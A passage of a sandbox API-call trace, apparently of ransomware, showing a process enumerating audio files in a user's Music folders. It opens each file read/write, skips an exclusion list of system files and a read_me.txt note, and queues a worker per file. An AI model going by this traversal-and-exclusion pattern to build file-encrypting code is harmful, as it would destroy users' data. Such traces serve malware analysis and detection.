RO\\eUUW3K55SiLSEX.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3irpeengfrfssd\\rd8rdpgmk_o u_ ro\\euuw3k55silsex.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x988 [0076.215] StrStrW (lpFirst="euuw3k55silsex.mp3", lpSrch="read_me.txt") returned 0x0 [0076.215] StrStrW (lpFirst="euuw3k55silsex.mp3", lpSrch="autoexec.bat") returned 0x0 [0076.215] StrStrW (lpFirst="euuw3k55silsex.mp3", lpSrch="desktop.ini") returned 0x0 [0076.215] StrStrW (lpFirst="euuw3k55silsex.mp3", lpSrch="autorun.inf") returned 0x0 [0076.215] StrStrW (lpFirst="euuw3k55silsex.mp3", lpSrch="ntuser.dat") returned 0x0 [0076.215] StrStrW (lpFirst="euuw3k55silsex.mp3", lpSrch="iconcache.db") returned 0x0 [0076.215] StrStrW (lpFirst="euuw3k55silsex.mp3", lpSrch="bootsect.bak") returned 0x0 [0076.215] StrStrW (lpFirst="euuw3k55silsex.mp3", lpSrch="boot.ini") returned 0x0 [0076.215] StrStrW (lpFirst="euuw3k55silsex.mp3", lpSrch="ntuser.dat.log") returned 0x0 [0076.215] StrStrW (lpFirst="euuw3k55silsex.mp3", lpSrch="thumbs.db") returned 0x0 [0076.215] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 132 [0076.215] QueueUserWorkItem (Function=0x404e00, Context=0x988, Flags=0x0) returned 1 [0076.215] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb25cab0, ftCreationTime.dwHighDateTime=0x1d4c821, ftLastAccessTime.dwLowDateTime=0x3c81a1b0, ftLastAccessTime.dwHighDateTime=0x1d4d4b3, ftLastWriteTime.dwLowDateTime=0x3c81a1b0, ftLastWriteTime.dwHighDateTime=0x1d4d4b3, nFileSizeHigh=0x0, nFileSizeLow=0x14600, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="Iy3mjA.m4a", cAlternateFileName="")) returned 1 [0076.215] wnsprintfW (in: pszDest=0x8d610c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\rd8rDpgMK_O U_ RO\\Iy3mjA.m4a") returned 83 [0076.215] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\rd8rDpgMK_O U_ RO\\Iy3mjA.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3irpeengfrfssd\\rd8rdpgmk_o u_ ro\\iy3mja.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x98c [0076.215] StrStrW (lpFirst="iy3mja.m4a", lpSrch="read_me.txt") returned 0x0 [0076.215] StrStrW (lpFirst="iy3mja.m4a", lpSrch="autoexec.bat") returned 0x0 [0076.215] StrStrW (lpFirst="iy3mja.m4a", lpSrch="desktop.ini") returned 0x0 [0076.215] StrStrW (lpFirst="iy3mja.m4a", lpSrch="autorun.inf") returned 0x0 [0076.215] StrStrW (lpFirst="iy3mja.m4a", lpSrch="ntuser.dat") returned 0x0 [0076.215] StrStrW (lpFirst="iy3mja.m4a", lpSrch="iconcache.db") returned 0x0 [0076.215] StrStrW (lpFirst="iy3mja.m4a", lpSrch="bootsect.bak") returned 0x0 [0076.216] StrStrW (lpFirst="iy3mja.m4a", lpSrch="boot.ini") returned 0x0 [0076.216] StrStrW (lpFirst="iy3mja.m4a", lpSrch="ntuser.dat.log") returned 0x0 [0076.216] StrStrW (lpFirst="iy3mja.m4a", lpSrch="thumbs.db") returned 0x0 [0076.216] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 133 [0076.216] QueueUserWorkItem (Function=0x404e00, Context=0x98c, Flags=0x0) returned 1 [0076.216] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf1ee90, ftCreationTime.dwHighDateTime=0x1d4ce2b, ftLastAccessTime.dwLowDateTime=0xae42c5f0, ftLastAccessTime.dwHighDateTime=0x1d4c75b, ftLastWriteTime.dwLowDateTime=0xae42c5f0, ftLastWriteTime.dwHighDateTime=0x1d4c75b, nFileSizeHigh=0x0, nFileSizeLow=0x57dd, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="Jk9z9eR5-bVH_B.wav", cAlternateFileName="JK9Z9E~1.WAV")) returned 1 [0076.216] wnsprintfW (in: pszDest=0x8d610c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\rd8rDpgMK_O U_ RO\\Jk9z9eR5-bVH_B.wav") returned 91 [0076.216] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\rd8rDpgMK_O U_ RO\\Jk9z9eR5-bVH_B.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3irpeengfrfssd\\rd8rdpgmk_o u_ ro\\jk9z9er5-bvh_b.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x990 [0076.216] StrStrW (lpFirst="jk9z9er5-bvh_b.wav", lpSrch="read_me.txt") returned 0x0 [0076.216] StrStrW (lpFirst="jk9z9er5-bvh_b.wav", lpSrch="autoexec.bat") returned 0x0 [0076.216] StrStrW (lpFirst="jk9z9er5-bvh_b.wav", lpSrch="desktop.ini") returned 0x0 [0076.216] StrStrW (lpFirst="jk9z9er5-bvh_b.wav", lpSrch="autorun.inf") returned 0x0 [0076.216] StrStrW (lpFirst="jk9z9er5-bvh_b.wav", lpSrch="ntuser.dat") returned 0x0 [0076.216] StrStrW (lpFirst="jk9z9er5-bvh_b.wav", lpSrch="iconcache.db") returned 0x0 [0076.216] StrStrW (lpFirst="jk9z9er5-bvh_b.wav", lpSrch="bootsect.bak") returned 0x0 [0076.216] StrStrW (lpFirst="jk9z9er5-bvh_b.wav", lpSrch="boot.ini") returned 0x0 [0076.216] StrStrW (lpFirst="jk9z9er5-bvh_b.wav", lpSrch="ntuser.dat.log") returned 0x0 [0076.216] StrStrW (lpFirst="jk9z9er5-bvh_b.wav", lpSrch="thumbs.db") returned 0x0 [0076.216] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 134 [0076.216] QueueUserWorkItem (Function=0x404e00, Context=0x990, Flags=0x0) returned 1 [0076.216] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5976c10, ftCreationTime.dwHighDateTime=0x1d4ca6e, ftLastAccessTime.dwLowDateTime=0xdc2df850, ftLastAccessTime.dwHighDateTime=0x1d4c994, ftLastWriteTime.dwLowDateTime=0xdc2df850, ftLastWriteTime.dwHighDateTime=0x1d4c994, nFileSizeHigh=0x0, nFileSizeLow=0x8c5a, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="Q9VlqWAtF0-DWdezS2.wav", cAlternateFileName="Q9VLQW~1.WAV")) returned 1 [0076.216] wnsprintfW (in: pszDest=0x8d610c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\rd8rDpgMK_O U_ RO\\Q9VlqWAtF0-DWdezS2.wav") returned 95 [0076.216] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\rd8rDpgMK_O U_ RO\\Q9VlqWAtF0-DWdezS2.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3irpeengfrfssd\\rd8rdpgmk_o u_ ro\\q9vlqwatf0-dwdezs2.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x994 [0076.216] StrStrW (lpFirst="q9vlqwatf0-dwdezs2.wav", lpSrch="read_me.txt") returned 0x0 [0076.217] StrStrW (lpFirst="q9vlqwatf0-dwdezs2.wav", lpSrch="autoexec.bat") returned 0x0 [0076.217] StrStrW (lpFirst="q9vlqwatf0-dwdezs2.wav", lpSrch="desktop.ini") returned 0x0 [0076.217] StrStrW (lpFirst="q9vlqwatf0-dwdezs2.wav", lpSrch="autorun.inf") returned 0x0 [0076.217] StrStrW (lpFirst="q9vlqwatf0-dwdezs2.wav", lpSrch="ntuser.dat") returned 0x0 [0076.217] StrStrW (lpFirst="q9vlqwatf0-dwdezs2.wav", lpSrch="iconcache.db") returned 0x0 [0076.217] StrStrW (lpFirst="q9vlqwatf0-dwdezs2.wav", lpSrch="bootsect.bak") returned 0x0 [0076.217] StrStrW (lpFirst="q9vlqwatf0-dwdezs2.wav", lpSrch="boot.ini") returned 0x0 [0076.217] StrStrW (lpFirst="q9vlqwatf0-dwdezs2.wav", lpSrch="ntuser.dat.log") returned 0x0 [0076.217] StrStrW (lpFirst="q9vlqwatf0-dwdezs2.wav", lpSrch="thumbs.db") returned 0x0 [0076.217] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 135 [0076.217] QueueUserWorkItem (Function=0x404e00, Context=0x994, Flags=0x0) returned 1 [0076.217] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24b8e0c0, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24b8e0c0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24b8e0c0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0076.217] wnsprintfW (in: pszDest=0x8d610c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\rd8rDpgMK_O U_ RO\\read_me.txt") returned 84 [0076.217] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\rd8rDpgMK_O U_ RO\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3irpeengfrfssd\\rd8rdpgmk_o u_ ro\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x998 [0076.217] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0076.217] CloseHandle (hObject=0x998) returned 1 [0076.217] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc240e8f0, ftCreationTime.dwHighDateTime=0x1d4cb90, ftLastAccessTime.dwLowDateTime=0x1497ade0, ftLastAccessTime.dwHighDateTime=0x1d4c638, ftLastWriteTime.dwLowDateTime=0x1497ade0, ftLastWriteTime.dwHighDateTime=0x1d4c638, nFileSizeHigh=0x0, nFileSizeLow=0x16cde, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="TeZH9 l1p.wav", cAlternateFileName="TEZH9L~1.WAV")) returned 1 [0076.217] wnsprintfW (in: pszDest=0x8d610c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\rd8rDpgMK_O U_ RO\\TeZH9 l1p.wav") returned 86 [0076.217] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\rd8rDpgMK_O U_ RO\\TeZH9 l1p.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3irpeengfrfssd\\rd8rdpgmk_o u_ ro\\tezh9 l1p.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x998 [0076.217] StrStrW (lpFirst="tezh9 l1p.wav", lpSrch="read_me.txt") returned 0x0 [0076.217] StrStrW (lpFirst="tezh9 l1p.wav", lpSrch="autoexec.bat") returned 0x0 [0076.218] StrStrW (lpFirst="tezh9 l1p.wav", lpSrch="desktop.ini") returned 0x0 [0076.218] StrStrW (lpFirst="tezh9 l1p.wav", lpSrch="autorun.inf") returned 0x0 [0076.218] StrStrW (lpFirst="tezh9 l1p.wav", lpSrch="ntuser.dat") returned 0x0 [0076.218] StrStrW (lpFirst="tezh9 l1p.wav", lpSrch="iconcache.db") returned 0x0 [0076.218] StrStrW (lpFirst="tezh9 l1p.wav", lpSrch="bootsect.bak") returned 0x0 [0076.218] StrStrW (lpFirst="tezh9 l1p.wav", lpSrch="boot.ini") returned 0x0 [0076.218] StrStrW (lpFirst="tezh9 l1p.wav", lpSrch="ntuser.dat.log") returned 0x0 [0076.218] StrStrW (lpFirst="tezh9 l1p.wav", lpSrch="thumbs.db") returned 0x0 [0076.218] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 136 [0076.218] QueueUserWorkItem (Function=0x404e00, Context=0x998, Flags=0x0) returned 1 [0076.218] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e2411b0, ftCreationTime.dwHighDateTime=0x1d4d1f4, ftLastAccessTime.dwLowDateTime=0xf600e110, ftLastAccessTime.dwHighDateTime=0x1d4c9ea, ftLastWriteTime.dwLowDateTime=0xf600e110, ftLastWriteTime.dwHighDateTime=0x1d4c9ea, nFileSizeHigh=0x0, nFileSizeLow=0x11b4c, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="YHz3s62rTdR5SUCJ45.m4a", cAlternateFileName="YHZ3S6~1.M4A")) returned 1 [0076.218] wnsprintfW (in: pszDest=0x8d610c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\rd8rDpgMK_O U_ RO\\YHz3s62rTdR5SUCJ45.m4a") returned 95 [0076.218] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\rd8rDpgMK_O U_ RO\\YHz3s62rTdR5SUCJ45.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3irpeengfrfssd\\rd8rdpgmk_o u_ ro\\yhz3s62rtdr5sucj45.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x99c [0076.218] StrStrW (lpFirst="yhz3s62rtdr5sucj45.m4a", lpSrch="read_me.txt") returned 0x0 [0076.218] StrStrW (lpFirst="yhz3s62rtdr5sucj45.m4a", lpSrch="autoexec.bat") returned 0x0 [0076.218] StrStrW (lpFirst="yhz3s62rtdr5sucj45.m4a", lpSrch="desktop.ini") returned 0x0 [0076.218] StrStrW (lpFirst="yhz3s62rtdr5sucj45.m4a", lpSrch="autorun.inf") returned 0x0 [0076.218] StrStrW (lpFirst="yhz3s62rtdr5sucj45.m4a", lpSrch="ntuser.dat") returned 0x0 [0076.218] StrStrW (lpFirst="yhz3s62rtdr5sucj45.m4a", lpSrch="iconcache.db") returned 0x0 [0076.218] StrStrW (lpFirst="yhz3s62rtdr5sucj45.m4a", lpSrch="bootsect.bak") returned 0x0 [0076.218] StrStrW (lpFirst="yhz3s62rtdr5sucj45.m4a", lpSrch="boot.ini") returned 0x0 [0076.218] StrStrW (lpFirst="yhz3s62rtdr5sucj45.m4a", lpSrch="ntuser.dat.log") returned 0x0 [0076.218] StrStrW (lpFirst="yhz3s62rtdr5sucj45.m4a", lpSrch="thumbs.db") returned 0x0 [0076.219] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 137 [0076.219] QueueUserWorkItem (Function=0x404e00, Context=0x99c, Flags=0x0) returned 1 [0076.219] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e2411b0, ftCreationTime.dwHighDateTime=0x1d4d1f4, ftLastAccessTime.dwLowDateTime=0xf600e110, ftLastAccessTime.dwHighDateTime=0x1d4c9ea, ftLastWriteTime.dwLowDateTime=0xf600e110, ftLastWriteTime.dwHighDateTime=0x1d4c9ea, nFileSizeHigh=0x0, nFileSizeLow=0x11b4c, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="yhz3s62rtdr5sucj45.m4a", cAlternateFileName="YHZ3S6~1.M4A")) returned 0 [0076.219] FindClose (in: hFindFile=0x7cfe968 | out: hFindFile=0x7cfe968) returned 1 [0076.219] wnsprintfW (in: pszDest=0x8d610c0, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\rd8rDpgMK_O U_ RO\\read_me.txt") returned 84 [0076.219] GetProcessHeap () returned 0x4f10000 [0076.219] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8d610c0 | out: hHeap=0x4f10000) returned 1 [0076.219] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 74 [0076.219] GetProcessHeap () returned 0x4f10000 [0076.219] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8d210a0 | out: hHeap=0x4f10000) returned 1 [0076.219] GetProcessHeap () returned 0x4f10000 [0076.219] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8d610c0 [0076.219] wnsprintfW (in: pszDest=0x8d610c0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\wmMLxSh\\*") returned 64 [0076.219] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\wmMLxSh\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfe7eb130, ftCreationTime.dwHighDateTime=0x1d4cee7, ftLastAccessTime.dwLowDateTime=0x24bb4220, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24bb4220, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe968 [0076.219] wnsprintfW (in: pszDest=0x8d610c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\wmMLxSh\\.") returned 64 [0076.220] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfe7eb130, ftCreationTime.dwHighDateTime=0x1d4cee7, ftLastAccessTime.dwLowDateTime=0x24bb4220, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24bb4220, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.220] wnsprintfW (in: pszDest=0x8d610c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\wmMLxSh\\..") returned 65 [0076.220] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6910e790, ftCreationTime.dwHighDateTime=0x1d4c617, ftLastAccessTime.dwLowDateTime=0x6decac40, ftLastAccessTime.dwHighDateTime=0x1d4d3dc, ftLastWriteTime.dwLowDateTime=0x6decac40, ftLastWriteTime.dwHighDateTime=0x1d4d3dc, nFileSizeHigh=0x0, nFileSizeLow=0xc889, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="brapnx BzMk5C.mp3", cAlternateFileName="BRAPNX~1.MP3")) returned 1 [0076.220] wnsprintfW (in: pszDest=0x8d610c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\wmMLxSh\\brapnx BzMk5C.mp3") returned 80 [0076.220] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\wmMLxSh\\brapnx BzMk5C.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3irpeengfrfssd\\wmmlxsh\\brapnx bzmk5c.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9a0 [0076.220] StrStrW (lpFirst="brapnx bzmk5c.mp3", lpSrch="read_me.txt") returned 0x0 [0076.220] StrStrW (lpFirst="brapnx bzmk5c.mp3", lpSrch="autoexec.bat") returned 0x0 [0076.220] StrStrW (lpFirst="brapnx bzmk5c.mp3", lpSrch="desktop.ini") returned 0x0 [0076.220] StrStrW (lpFirst="brapnx bzmk5c.mp3", lpSrch="autorun.inf") returned 0x0 [0076.220] StrStrW (lpFirst="brapnx bzmk5c.mp3", lpSrch="ntuser.dat") returned 0x0 [0076.220] StrStrW (lpFirst="brapnx bzmk5c.mp3", lpSrch="iconcache.db") returned 0x0 [0076.220] StrStrW (lpFirst="brapnx bzmk5c.mp3", lpSrch="bootsect.bak") returned 0x0 [0076.220] StrStrW (lpFirst="brapnx bzmk5c.mp3", lpSrch="boot.ini") returned 0x0 [0076.220] StrStrW (lpFirst="brapnx bzmk5c.mp3", lpSrch="ntuser.dat.log") returned 0x0 [0076.220] StrStrW (lpFirst="brapnx bzmk5c.mp3", lpSrch="thumbs.db") returned 0x0 [0076.220] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 138 [0076.220] QueueUserWorkItem (Function=0x404e00, Context=0x9a0, Flags=0x0) returned 1 [0076.220] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac715430, ftCreationTime.dwHighDateTime=0x1d4c972, ftLastAccessTime.dwLowDateTime=0xc044fa10, ftLastAccessTime.dwHighDateTime=0x1d4d2b0, ftLastWriteTime.dwLowDateTime=0xc044fa10, ftLastWriteTime.dwHighDateTime=0x1d4d2b0, nFileSizeHigh=0x0, nFileSizeLow=0x2fe1, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="j06Qfw1.m4a", cAlternateFileName="")) returned 1 [0076.220] wnsprintfW (in: pszDest=0x8d610c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\wmMLxSh\\j06Qfw1.m4a") returned 74 [0076.220] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\wmMLxSh\\j06Qfw1.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3irpeengfrfssd\\wmmlxsh\\j06qfw1.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9a4 [0076.220] StrStrW (lpFirst="j06qfw1.m4a", lpSrch="read_me.txt") returned 0x0 [0076.220] StrStrW (lpFirst="j06qfw1.m4a", lpSrch="autoexec.bat") returned 0x0 [0076.221] StrStrW (lpFirst="j06qfw1.m4a", lpSrch="desktop.ini") returned 0x0 [0076.221] StrStrW (lpFirst="j06qfw1.m4a", lpSrch="autorun.inf") returned 0x0 [0076.221] StrStrW (lpFirst="j06qfw1.m4a", lpSrch="ntuser.dat") returned 0x0 [0076.221] StrStrW (lpFirst="j06qfw1.m4a", lpSrch="iconcache.db") returned 0x0 [0076.221] StrStrW (lpFirst="j06qfw1.m4a", lpSrch="bootsect.bak") returned 0x0 [0076.221] StrStrW (lpFirst="j06qfw1.m4a", lpSrch="boot.ini") returned 0x0 [0076.221] StrStrW (lpFirst="j06qfw1.m4a", lpSrch="ntuser.dat.log") returned 0x0 [0076.221] StrStrW (lpFirst="j06qfw1.m4a", lpSrch="thumbs.db") returned 0x0 [0076.221] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 139 [0076.221] QueueUserWorkItem (Function=0x404e00, Context=0x9a4, Flags=0x0) returned 1 [0076.221] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec089880, ftCreationTime.dwHighDateTime=0x1d4cd49, ftLastAccessTime.dwLowDateTime=0xcfbffa80, ftLastAccessTime.dwHighDateTime=0x1d4c932, ftLastWriteTime.dwLowDateTime=0xcfbffa80, ftLastWriteTime.dwHighDateTime=0x1d4c932, nFileSizeHigh=0x0, nFileSizeLow=0xd358, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="PtDamlq6EPCO4.mp3", cAlternateFileName="PTDAML~1.MP3")) returned 1 [0076.221] wnsprintfW (in: pszDest=0x8d610c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\wmMLxSh\\PtDamlq6EPCO4.mp3") returned 80 [0076.221] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\wmMLxSh\\PtDamlq6EPCO4.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3irpeengfrfssd\\wmmlxsh\\ptdamlq6epco4.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9a8 [0076.221] StrStrW (lpFirst="ptdamlq6epco4.mp3", lpSrch="read_me.txt") returned 0x0 [0076.221] StrStrW (lpFirst="ptdamlq6epco4.mp3", lpSrch="autoexec.bat") returned 0x0 [0076.221] StrStrW (lpFirst="ptdamlq6epco4.mp3", lpSrch="desktop.ini") returned 0x0 [0076.221] StrStrW (lpFirst="ptdamlq6epco4.mp3", lpSrch="autorun.inf") returned 0x0 [0076.221] StrStrW (lpFirst="ptdamlq6epco4.mp3", lpSrch="ntuser.dat") returned 0x0 [0076.221] StrStrW (lpFirst="ptdamlq6epco4.mp3", lpSrch="iconcache.db") returned 0x0 [0076.221] StrStrW (lpFirst="ptdamlq6epco4.mp3", lpSrch="bootsect.bak") returned 0x0 [0076.221] StrStrW (lpFirst="ptdamlq6epco4.mp3", lpSrch="boot.ini") returned 0x0 [0076.221] StrStrW (lpFirst="ptdamlq6epco4.mp3", lpSrch="ntuser.dat.log") returned 0x0 [0076.221] StrStrW (lpFirst="ptdamlq6epco4.mp3", lpSrch="thumbs.db") returned 0x0 [0076.221] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 140 [0076.221] QueueUserWorkItem (Function=0x404e00, Context=0x9a8, Flags=0x0) returned 1 [0076.222] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24bb4220, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24bb4220, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24bb4220, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, 